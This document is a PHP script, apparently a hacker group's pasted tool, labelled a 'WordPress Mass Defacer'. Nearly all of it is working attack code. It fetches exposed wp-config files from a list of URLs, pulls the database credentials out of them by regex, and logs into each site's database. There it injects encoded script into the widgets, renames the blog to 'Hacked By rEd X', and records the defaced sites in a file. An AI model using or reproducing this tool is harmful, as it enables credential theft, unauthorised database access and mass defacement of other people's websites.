3xp1r3 Cyber Army | wordpress mass deface | by rEd X

1. 3xp1r3 Cyber Army | wordpress mass deface
2. ./rEd X
3.  
4. <?php
5. /**
6. * @author: FaisaL Ahmed aka rEd X
7. * @mail: [email protected]
8. * @Last Updated: 19 July 2015
9. */
10.  
11. set_time_limit(0);
12. ini_set('display_errors', 0);
13.  
14. echo '<html><head>
15. <title>WordPress Mass Defacer | 3xp1r3 Cyber Army</title>
16. <meta content="text/html; charset=utf-8">
17. <meta name="keywords" content="WordPress Defacer, 3xp1r3, 3xp1r3 Cyber Army, rEd X" />
18. <meta name="description" content="WordPress Defacer" />
19. <meta name="author" content="rEd X" />
20. <link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
21. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
22. <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
23. </head><body>';
24.  
25. echo '<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">WordPress Mass Defacer<br>_{3xp1r3 Cyber Army}</div><br/>';
26.  
27. echo '<form method="POST" action="" ><center><table border="1">
28. <tr><td>Config List:</td><td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
29. <tr><td>Deface :</td><td><textarea name="index" cols="50" rows="10" ></textarea></td></tr></table>
30. <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
31.  
32. if ($_POST['action']=='1'){
33. if ($_POST['url']==''){
34. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
35. }else{
36. $url=$_POST['url'];
37. $users = explode("\n",$url);
38. foreach ($users as $user) {
39. $user1=trim($user);
40. $code=file_get_contents2($user1);
41. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
42. $db=$b1[1][0];
43. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
44. $user=$b2[1][0];
45. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
46. $db_password=$b3[1][0];
47. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
48. $host=$b4[1][0];
49. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
50. $p=$b5[1][0];
51.  
52. $d=@mysql_connect( $host, $user, $db_password ) ;
53. if ($d){
54. @mysql_select_db($db );
55. $source=stripslashes($_POST['index']);
56. $s2=strToHex(($source));
57. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
58. $ls=strlen($s)-2;
59. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
60. mysql_query($sql) ;
61. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
62. mysql_query($sql) ;
63. if (function_exists("mb_convert_encoding") )
64. {
65. $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
66. $source2=mysql_real_escape_string($source2);
67. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked By rEd X - 3xp1r3 Cyber Army' WHERE `option_name` = 'blogname';"; // Change rEd X to your Nick
68. @mysql_query($sql) ; ;
69. $sql = "UPDATE `".$p."options` SET `option_value` = 'rEd X Was Here' WHERE `option_name` = 'blogdescription';"; // Change rEd X to your Nick
70. @mysql_query($sql) ; ;
71. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
72. @mysql_query($sql) ; ;
73. }
74. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
75. $siteurl=@mysql_fetch_array($aa) ;
76. $siteurl=$siteurl['option_value'];
77. $tr.="$siteurl\n";
78. mysql_close();
79. }
80. }
81. if ($tr)
82. $filename = 'list.txt';
83. $fp = fopen($filename, "a+");
84. $write = fputs($fp, $tr);
85. fclose($fp);
86. echo "<div class='result'>Defacing Completed ! :)<br><br>";
87. echo "<a href='list.txt' target='_blank'>View List of Defaced Sites</a></div><br/>";
88. //echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
89. }
90. }
91.  
92. function strToHex($string)
93. {
94. $hex='';
95. for ($i=0; $i < strlen($string); $i++)
96. {
97. if (strlen(dechex(ord($string[$i])))==1){
98. $hex .="%0". dechex(ord($string[$i]));
99. }
100. else
101. {
102. $hex .="%". dechex(ord($string[$i]));
103. }
104. }
105. return $hex;
106. }
107.  
108. function file_get_contents2($u){
109.  
110. $ch = curl_init();
111. curl_setopt($ch,CURLOPT_URL,$u);
112. curl_setopt($ch, CURLOPT_HEADER, 0);
113. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
114. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
115. $result = curl_exec($ch);
116. return $result ;
117. }
118. echo "<br><br>&#169; rEd X | 3xp1r3 Cyber Army";
119. ?>